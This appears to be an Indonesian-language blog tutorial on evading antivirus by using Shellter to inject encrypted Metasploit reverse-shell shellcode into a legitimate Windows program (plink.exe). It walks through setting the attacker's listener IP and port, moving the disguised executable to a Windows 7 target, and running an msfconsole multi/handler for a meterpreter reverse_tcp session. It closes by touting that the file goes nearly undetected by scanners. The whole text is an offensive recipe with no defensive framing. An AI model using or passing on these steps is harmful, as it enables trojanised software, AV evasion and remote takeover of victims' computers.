Bagi para pengguna Metasploit, tantangan yang sering dihadapi adalah menghadapi AntiVirus pada target. Hal ini sering membuat payload yang kita buat menjadi gagal untuk dieksekusi. Namun terdapat berbagai cara untuk melewati AV salah satunya dengan menggunakan tool Shellter.

Shellter merupakan sebuah tool yang berfungsi untuk memasukkan shellcode injection kedalam aplikasi Windows.Shellcode tersebut dapat dibuat dari framework seperti Metasploit.

Shellter bekerja dengan mengambil sebuah aplikasi di sistem operasi Windows dan kemudian file aplikasi tersebut dimasukkan shellcode yang terenkripsi menggunakan custom encoder dari Shellter sehingga sangat sulit untuk dideteksi oleh AV.

Kali ini kita akan mencoba menggunakan Shellter dimana targetnya adalah komputer yang menggunakan Windows 7 dan sebagai attacker menggunakan Kali Linux atau Backbox.

1. Install shellter di Kali Linux atau Backbox dengan perintah
sudo apt-get update
sudo apt-get install shellter

2. Selanjutnya kita pilih sebuah aplikasi Windows, contohnya plink.exe yaitu PuTTY versi command-line yang dapat kita download di http://the.earth.li/~sgtatham/putty/latest/x86/plink.exe. Tool inilah yang akan kita coba untuk dimasukkan shellcode. Lalu simpan tool tersebut ke dalam direktori Home anda.

3. Jalankan shellter dengan mengetikkan ‘shellter’ di terminal (tanpa tanda petik).

Tekan A untuk Automatic Mode

4. Pada PE Target Masukkan plink.exe

5. Tunggu hingga pembuatan Payload. Lalu tekan L dan pilih 1

6. Masukkan IP dan Port sebagai listener (Attacker) .

7. Shellter akan melakukan obfuscating dan enkripsi pada shellcode agar tidak dapat dideteksi oleh AV

8. Setelah selesai, plink.exe kita pindahkan ke target Windows 7

terlihat aplikasi ini seperti aplikasi biasa, namun didalamnya terdapat sebuah shellcode yang akan di reverse ke listener (Attacker).

9. Sebelum eksekusi file kita jalankan dulu metasploit
sudo msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.5
set lport 8877
exploit

10. Ketika plink.exe dieksekusi maka aplikasi tersebut akan membuka session dan attacker berhasil medapatkan akses ke target.

Berdasarkan hasil scanning online dengan 35 AntiVirus, Hasilnya adalah 1/29 yang artinya file ini dianggap file biasa dan tidak terdeteksi sebagai virus/Backdoor.